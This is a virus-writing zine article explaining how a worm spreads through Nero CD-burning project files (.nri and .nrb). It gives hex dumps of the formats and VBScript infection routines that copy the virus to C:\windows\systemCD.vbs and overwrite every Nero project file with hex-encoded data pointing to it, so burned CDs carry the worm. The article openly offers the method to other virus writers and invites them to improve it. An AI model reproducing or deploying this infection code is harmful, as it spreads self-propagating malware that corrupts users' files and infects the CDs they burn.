ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ New Idea,spreading virus via CD Room ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ I. INTRO II. NRI FILES III. NRB FILES IV. OVERWRITING STRATEGY V. NON OVERWRITING STRATEGY VI. LAST ÄÄÄÄÄÄÄÄÄÄÄÄÄÄ I. INTRO ÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Have you see my I-worm.Tsunami ?? Yeah, that virus is the first virus I think which has ability to spread it self via CD-ROOM, and I wrote that just as proof of concept,what virus can do by searching the new legal technology that containing bugs.Soo In this article I just want to show you the background of the new methodelogy of this virus eXchanges. I think this is the first article which talkin about this methodelogy,soo In this article,I just want to show you a background of this stuPh,the concept,advantage(+),loss(-), and Anythings all things among it. .1st [Background] What made me interest in this case ? Nowday,the world of Computer is very modern, In my Country Indonesia More than 70% college student have their own CD-WRITER(you now that in Indonesia there soo many SOFTWARES PLOUGHMAN).Soo I think it'll be very nice if I make some new stuPh to make a new feature of virus technology. .2nd [Nero] Before you thinking about how it work,its better if you know how those CD-WRITER work,isn't ?,OK CD-WRITER can't work if there is no Burner software which used to burn a CD and NowDay NERO Product is still the giant of CD-BURNER Software,Because of that, Now We gonna talk about those NERO. .3th [Nero Files type] Nero has 2 files type that is portable for it,first is Data disk(*.nri) and Bootable data disk (*.nrb),you must be know what is the different betwen 2 files above.Data disk(*.nri) is used for Data CD, and Bootable data disk(*.nrb) is for Bootable CD-room. .4th [Security Hole] Some ppl will save their project before the burn the CD, I think this is the bug of CD-WRITER technology.We can make a mal-Code to Infect it. Ok there is a bit background about Nero (The most famous CD-BURNER Software). Now than we gonna find something what inside of those files type. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ II. NRI FILES ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Offset 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 00000000 0E 4E 65 72 6F 49 53 4F 30 2E 30 32 2E 30 33 01 .NeroISO0.02.03. 00000016 00 00 00 01 00 00 00 00 00 12 4E 45 52 4F 20 2D ..........NERO - 00000032 20 42 55 52 4E 49 4E 47 20 52 4F 4D 00 00 00 88 BURNING ROM...ˆ 00000048 3E 43 41 88 3E 43 41 FF FF FF FF FF FF FF FF 00 >CAˆ>CAÿÿÿÿÿÿÿÿ. 00000064 00 00 00 88 3E 43 41 01 00 00 00 00 00 00 00 01 ...ˆ>CA......... 00000080 00 00 00 01 00 00 00 01 00 00 00 00 00 00 00 07 ................ 00000096 4D 79 20 44 69 73 63 07 4D 79 20 44 69 73 63 10 My Disc.My Disc. 00000112 00 00 00 00 00 00 00 00 00 00 00 01 C0 AA 97 10 ............Àª—. 00000128 2A 98 C4 01 E0 5A 21 2F 2A 98 C4 01 C0 AA 97 10 *˜Ä.àZ!/*˜Ä.Àª—. 00000144 2A 98 C4 01 00 00 40 00 00 00 00 00 00 00 00 00 *˜Ä...@......... 00000160 00 00 00 02 00 00 00 43 3A 02 00 00 00 01 07 00 .......C:....... 00000176 00 00 57 49 4E 44 4F 57 53 01 00 00 00 00 02 00 ..WINDOWS....... 00000192 00 08 70 6F 6C 79 2E 74 78 74 20 00 00 00 2A 05 ..poly.txt ...*. 00000208 00 00 01 00 00 00 00 80 14 57 66 13 98 C4 01 00 .......€.Wf.˜Ä.. 00000224 4C E7 F2 1B 98 C4 01 60 95 7C 19 2A 98 C4 01 00 Lçò.˜Ä.`•|.*˜Ä.. 00000240 00 00 10 02 5F 5F 5F 31 56 43 44 31 06 00 01 00 ....___1VCD1.... 00000256 00 00 04 00 00 00 00 00 45 44 4A 4F 03 00 01 00 ........EDJO.... 00000272 00 00 01 00 02 44 4F 53 5F 0A 00 01 00 00 00 08 .....DOS_....... 00000288 00 70 6F 6C 79 2E 74 78 74 46 53 49 5A 0A 00 01 .poly.txtFSIZ... 00000304 00 00 00 08 00 2A 05 00 00 00 00 00 00 50 52 49 .....*.......PRI 00000320 4F 0A 00 02 00 00 00 04 00 00 00 00 00 04 00 00 O............... 00000336 00 00 00 45 4E 44 21 02 00 00 00 00 00 00 00 00 ...END!......... 00000352 00 00 00 00 00 00 0B 57 45 4C 43 4F 4D 45 2E 45 .......WELCOME.E 00000368 58 45 20 00 00 00 00 40 04 00 02 00 00 00 00 20 XE ....@....... 00000384 F0 05 22 39 78 C4 01 00 74 93 B4 D7 8D BE 01 A0 ð."9xÄ..t“´×¾.  00000400 6A 46 2B 2A 98 C4 01 00 00 00 10 02 5F 5F 5F 31 jF+*˜Ä......___1 00000416 56 43 44 31 06 00 01 00 00 00 04 00 00 00 00 00 VCD1............ 00000432 45 44 4A 4F 03 00 01 00 00 00 01 00 02 44 4F 53 EDJO.........DOS 00000448 5F 0D 00 01 00 00 00 0B 00 57 45 4C 43 4F 4D 45 _........WELCOME 00000464 2E 45 58 45 46 53 49 5A 0A 00 01 00 00 00 08 00 .EXEFSIZ........ 00000480 00 40 04 00 00 00 00 00 50 52 49 4F 0A 00 02 00 .@......PRIO.... 00000496 00 00 04 00 00 00 00 00 04 00 00 00 00 00 45 4E ..............EN 00000512 44 21 02 00 00 00 00 00 00 00 00 00 00 00 00 00 D!.............. 00000528 42 55 53 54 6A 00 00 00 00 00 00 00 01 00 00 00 BUSTj........... 00000544 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000560 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 ................ 00000576 00 00 01 00 FF FF FF 7F 00 00 00 00 00 00 00 00 ....ÿÿÿ........ 00000592 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 ................ 00000608 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 ................ 00000624 00 00 00 00 00 00 00 00 00 00 4B 4E 55 4A 54 42 ..........KNUJTB 00000640 4F 4E 59 48 4F 4E 53 4D 54 42 15 4E 65 72 6F 20 ONYHONSMTB.Nero 00000656 42 6F 6F 74 2D 4C 6F 61 64 65 72 20 56 33 2E 30 Boot-Loader V3.0 00000672 4C 4F 56 4A 03 4E 45 57 00 00 00 00 12 4E 65 72 LOVJ.NEW.....Ner 00000688 6F 20 2D 20 42 75 72 6E 69 6E 67 20 52 4F 4D 00 o - Burning ROM. 00000704 00 00 01 00 00 00 54 4E 45 4E 46 44 55 4E 45 42 ......TNENFDUNEB 00000720 4F 4E ON ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ That is Sample Debug mode of Sample *.NRI files, you see that those file just saving the path of files which will be burned.That file containing 2 path of files. that is "C:\poly.txt" and "C:\windows\welcome.exe". as you see that path above is ended by Ascii "END!" and begining from "@". ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ @......... | 00000160 00 00 00 02 00 00 00 43 3A 02 00 00 00 01 07 00 .......C:....... | 00000176 00 00 57 49 4E 44 4F 57 53 01 00 00 00 00 02 00 ..WINDOWS....... | 00000192 00 08 70 6F 6C 79 2E 74 78 74 20 00 00 00 2A 05 ..poly.txt ...*. | 00000208 00 00 01 00 00 00 00 80 14 57 66 13 98 C4 01 00 .......€.Wf.˜Ä.. | 00000224 4C E7 F2 1B 98 C4 01 60 95 7C 19 2A 98 C4 01 00 Lçò.˜Ä.`•|.*˜Ä.. | 00000240 00 00 10 02 5F 5F 5F 31 56 43 44 31 06 00 01 00 ....___1VCD1.... | The path of 00000256 00 00 04 00 00 00 00 00 45 44 4A 4F 03 00 01 00 ........EDJO.... | "C:\poly.txt" 00000272 00 00 01 00 02 44 4F 53 5F 0A 00 01 00 00 00 08 .....DOS_....... | 00000288 00 70 6F 6C 79 2E 74 78 74 46 53 49 5A 0A 00 01 .poly.txtFSIZ... | 00000304 00 00 00 08 00 2A 05 00 00 00 00 00 00 50 52 49 .....*.......PRI | 00000320 4F 0A 00 02 00 00 00 04 00 00 00 00 00 04 00 00 O............... | 00000336 00 00 00 45 4E 44 21 02 00 00 00 00 00 00 00 00 ...END! | ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ And as you see it,that path above contains 2 "poly.txt", yeahh That is for DOS Path and windoz path. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ III. NRB FILES ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Offset 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 00000000 0E 4E 65 72 6F 49 53 4F 30 2E 30 32 2E 30 33 01 .NeroISO0.02.03. 00000016 00 00 00 01 00 00 00 00 00 12 4E 45 52 4F 20 2D ..........NERO - 00000032 20 42 55 52 4E 49 4E 47 20 52 4F 4D 00 00 00 C4 BURNING ROM...Ä 00000048 3E 43 41 C4 3E 43 41 FF FF FF FF FF FF FF FF 00 >CAÄ>CAÿÿÿÿÿÿÿÿ. 00000064 00 00 00 C4 3E 43 41 01 00 00 00 00 00 00 00 01 ...Ä>CA......... 00000080 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 07 ................ 00000096 4D 79 20 44 69 73 63 07 4D 79 20 44 69 73 63 10 My Disc.My Disc. 00000112 00 00 00 00 00 00 00 00 00 00 00 01 20 8A 36 32 ............ Š62 00000128 2A 98 C4 01 90 51 84 43 2A 98 C4 01 20 8A 36 32 *˜Ä.Q„C*˜Ä. Š62 00000144 2A 98 C4 01 00 00 40 00 00 00 00 00 00 00 00 00 *˜Ä...@......... 00000160 00 00 00 02 00 00 00 43 3A 02 00 00 00 01 07 00 .......C:....... 00000176 00 00 57 49 4E 44 4F 57 53 01 00 00 00 00 02 00 ..WINDOWS....... 00000192 00 08 70 6F 6C 79 2E 74 78 74 20 00 00 00 2A 05 ..poly.txt ...*. 00000208 00 00 01 00 00 00 00 80 14 57 66 13 98 C4 01 00 .......€.Wf.˜Ä.. 00000224 4C E7 F2 1B 98 C4 01 90 22 8F 3F 2A 98 C4 01 00 Lçò.˜Ä."?*˜Ä.. 00000240 00 00 10 02 5F 5F 5F 31 56 43 44 31 06 00 01 00 ....___1VCD1.... 00000256 00 00 04 00 00 00 00 00 45 44 4A 4F 03 00 01 00 ........EDJO.... 00000272 00 00 01 00 02 44 4F 53 5F 0A 00 01 00 00 00 08 .....DOS_....... 00000288 00 70 6F 6C 79 2E 74 78 74 46 53 49 5A 0A 00 01 .poly.txtFSIZ... 00000304 00 00 00 08 00 2A 05 00 00 00 00 00 00 50 52 49 .....*.......PRI 00000320 4F 0A 00 02 00 00 00 04 00 00 00 00 00 04 00 00 O............... 00000336 00 00 00 45 4E 44 21 02 00 00 00 00 00 00 00 00 ...END!......... 00000352 00 00 00 00 00 00 08 74 61 73 6D 2E 65 78 65 20 .......tasm.exe 00000368 00 00 00 B3 9C 01 00 02 00 00 00 00 40 FB 68 B7 ...³œ.......@ûh· 00000384 48 6D C4 01 00 27 A8 D4 69 6D C4 01 70 11 05 3C HmÄ..'¨ÔimÄ.p..< 00000400 2A 98 C4 01 00 00 00 10 02 5F 5F 5F 31 56 43 44 *˜Ä......___1VCD 00000416 31 06 00 01 00 00 00 04 00 00 00 00 00 45 44 4A 1............EDJ 00000432 4F 03 00 01 00 00 00 01 00 02 44 4F 53 5F 0A 00 O.........DOS_.. 00000448 01 00 00 00 08 00 54 41 53 4D 2E 45 58 45 46 53 ......TASM.EXEFS 00000464 49 5A 0A 00 01 00 00 00 08 00 B3 9C 01 00 00 00 IZ........³œ.... 00000480 00 00 50 52 49 4F 0A 00 02 00 00 00 04 00 00 00 ..PRIO.......... 00000496 00 00 04 00 00 00 00 00 45 4E 44 21 02 00 00 00 ........END!.... 00000512 00 00 00 00 00 00 00 00 00 00 42 55 53 54 6A 00 ..........BUSTj. 00000528 00 00 00 00 00 00 01 00 00 00 01 00 00 00 00 00 ................ 00000544 00 00 00 00 00 00 00 00 00 00 01 00 00 00 01 00 ................ 00000560 00 00 01 00 00 00 00 00 00 00 00 00 01 00 FF FF ..............ÿÿ 00000576 FF 7F 00 00 00 00 00 00 00 00 01 00 00 00 00 00 ÿ.............. 00000592 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000608 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 ................ 00000624 00 00 00 00 4B 4E 55 4A 54 4F 4F 42 00 00 00 00 ....KNUJTOOB.... 00000640 FF FF FF FF 2E 44 3A 5C 50 72 6F 67 72 61 6D 20 ÿÿÿÿ.D:\Program 00000656 46 69 6C 65 73 5C 41 68 65 61 64 5C 4E 65 72 6F Files\Ahead\Nero 00000672 5C 44 72 44 6F 73 42 6F 6F 74 69 6D 61 67 65 2E \DrDosBootimage. 00000688 49 4D 41 C0 07 01 00 02 00 59 48 4F 4E 53 4D 54 IMAÀ.....YHONSMT 00000704 42 17 43 72 65 61 74 65 64 20 62 79 20 4E 65 72 B.Created by Ner 00000720 6F 20 45 78 70 72 65 73 73 4C 4F 56 4A 03 4E 45 o ExpressLOVJ.NE 00000736 57 00 00 00 00 12 4E 65 72 6F 20 2D 20 42 75 72 W.....Nero - Bur 00000752 6E 69 6E 67 20 52 4F 4D 00 00 00 01 00 00 00 54 ning ROM.......T 00000768 4E 45 4E 46 44 55 4E 58 45 4F 42 00 00 00 00 NENFDUNXEOB.... ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ I think the NRB Structure is same as NRI Structure,the different just in NRB is designed for Bootable CD-Room just look at the bottom of those debug-mode. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 00000624 00 00 00 00 4B 4E 55 4A 54 4F 4F 42 00 00 00 00 ....KNUJTOOB.... 00000640 FF FF FF FF 2E 44 3A 5C 50 72 6F 67 72 61 6D 20 ÿÿÿÿ.D:\Program 00000656 46 69 6C 65 73 5C 41 68 65 61 64 5C 4E 65 72 6F Files\Ahead\Nero 00000672 5C 44 72 44 6F 73 42 6F 6F 74 69 6D 61 67 65 2E \DrDosBootimage. 00000688 49 4D 41 C0 07 01 00 02 00 59 48 4F 4E 53 4D 54 IMAÀ.....YHONSMT 00000704 42 17 43 72 65 61 74 65 64 20 62 79 20 4E 65 72 B.Created by Ner 00000720 6F 20 45 78 70 72 65 73 73 4C 4F 56 4A 03 4E 45 o ExpressLOVJ.NE 00000736 57 00 00 00 00 12 4E 65 72 6F 20 2D 20 42 75 72 W.....Nero - Bur 00000752 6E 69 6E 67 20 52 4F 4D 00 00 00 01 00 00 00 54 ning ROM.......T 00000768 4E 45 4E 46 44 55 4E 58 45 4F 42 00 00 00 00 NENFDUNXEOB.... ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ IV. OVERWRITING STRATEGY ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ It has been improved in my I-worm.Tsunami, The easiest way to infect that files is overwrite the files with your current virus path.and a step you should do is : 1. Make your own *.nri/*nrb file which the value is your current virus path 2. Convert it 3. And overwrite every host(*.nri/*nrb) with ur own file. Its very fleksible even script can do that too.see this snipped code from my MVBSWE : nrb : ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 'Backup files put on C:\windows\systemCD.vbs '------------------------------------------------------------ Set Fso=CreateObject("Scripting.FileSystemObject") cpy.Copy(Fso.GetSpecialFolder(0)&"\systemCD.vbs") 'Put this function on your infection function routine '---------------------------------------------------- If fso.GetExtensionName(file.path)="nrb" then a = "0E4E65726F49534F302E30322E303301000000010000000000124" b = "E45524F202D204255524E494E4720524F4D0000003428F9403428" c = "F940FFFFFFFFFFFFFFFF000000003428F94001000000000000000" d = "1000000010000000100000001000000074D792044697363074D79" e = "20446973631000000000000000000000000180568737016CC4018" f = "072D545016CC40180568737016CC4010000400000000000000000" g = "0000000002000000433A01000000010700000057494E444F57530" h = "1000000000100000C73797374656D43442E766273200000000000" i = "00000200000000E096F8B33B6CC401002B70BA3B6CC40180B5D34" j = "0016CC40100000010025F5F5F3156434431060001000000040000" k = "00000045444A4F030001000000010002444F535F0E00010000000" l = "C0053595354454D43442E5642534653495A0A0001000000080000" m = "000000000000005052494F0A00020000000400000000000400000" n = "00000454E44210200000000000000000000000000425553546A00" o = "00000000000001000000010000000000000000000000000000000" p = "100000001000000010000000000000000000100FFFFFF7F000000" q = "00000000000100000000000000010000000000000000000000000" r = "000000000000000000100000000000000000000004B4E554A544F" s = "4F4200000000FFFFFFFF2E433A5C50524F4752414D2046494C455" t = "35C41484541445C4E45524F5C4472446F73426F6F74696D616765" u = "2E494D41C0070100020059484F4E534D544217437265617465642" v = "06279204E65726F20457870726573734C4F564A034E4557000000" w = "00124E65726F202D204275726E696E6720524F4D0000000100000" x = "0544E454E4644554E58454F4200000000 GenCode = a&b&c&d&e&f&g&h&i&j&k&l&m&n&o&p&q&r&s&t&u&v&w&x For letscount = 1 To Len(GenCode) Step 2 NewCode = NewCode & Chr("&h"& Mid(GenCode, letscount, 2)) next Set YourFile = fso.createtextfile(file.path, True) YourFile.write NewCode YourFile.close ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ nri : ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 'Backup files put on C:\windows\systemCD.vbs '------------------------------------------------------------ Set Fso=CreateObject("Scripting.FileSystemObject") cpy.Copy(Fso.GetSpecialFolder(0)&"\systemCD.vbs") 'Put this function on your infection function routine '---------------------------------------------------- If fso.GetExtensionName(file.path)="nri" then a = "0E4E65726F49534F302E30322E3033010000000100000000001" b = "24E45524F202D204255524E494E4720524F4D000000F827F940" c = "F827F940FFFFFFFFFFFFFFFF00000000F827F94001000000000" d = "0000001000000010000000100000000000000074D7920446973" e = "63074D7920446973631000000000000000000000000140CBC31" f = "B016CC401A0811333016CC40140CBC31B016CC4010000400000" g = "0000000000000000000002000000433A0100000001070000005" h = "7494E444F575301000000000100000C73797374656D43442E76" i = "627320000000000000000200000000E096F8B33B6CC401002B7" j = "0BA3B6CC40120B8FD28016CC40100000010025F5F5F31564344" k = "3106000100000004000000000045444A4F03000100000001000" l = "2444F535F0E00010000000C0053595354454D43442E56425346" m = "53495A0A0001000000080000000000000000005052494F0A000" n = "2000000040000000000040000000000454E4421020000000000" o = "0000000000000000425553546A0000000000000001000000010" p = "000000000000000000000000000000100000000000000010000" q = "000000000000000100FFFFFF7F0000000000000000010000000" r = "000000001000000000000000000000000000000000000000000" s = "0100000000000000000000004B4E554A54424F4E59484F4E534" t = "D5442154E65726F20426F6F742D4C6F616465722056332E304C" u = "4F564A034E455700000000124E65726F202D204275726E696E6" v = "720524F4D00000001000000544E454E4644554E45424F4E" GenCode = a&b&c&d&e&f&g&h&i&j&k&l&m&n&o&p&q&r&s&t&u&v For letscount = 1 To Len(GenCode) Step 2 NewCode = NewCode & Chr("&h"& Mid(GenCode, letscount, 2)) next Set YourFile = fso.createtextfile(file.path, True) YourFile.write NewCode YourFile.close ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ V. NON OVERWRITING STRATEGY ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Ive try hard to improve it, but I things its hard to do it.Cos I don't know the structure of those files type, and I think just NERO Programers know about it, cos they have the algolrythm right ? Some touch about this : As you see the core of those structure is : * Remember "the path" is begining from "@" and ended by "END!" Maybe you are a genius,u can improve it.I'll wait for it :) ÄÄÄÄÄÄÄÄÄÄÄÄÄ VI. LAST ÄÄÄÄÄÄÄÄÄÄÄÄÄ ohh.. yeah Sorry for my BAD English,You know,English isn't my Motha languaage Ok,Im soo fuckin lazy to write the last word.Just... Bye..bye... c u next time in better time ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Psychologic aka PuPpY psychologic@hotmail.com http://psychologic.uni.cc ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ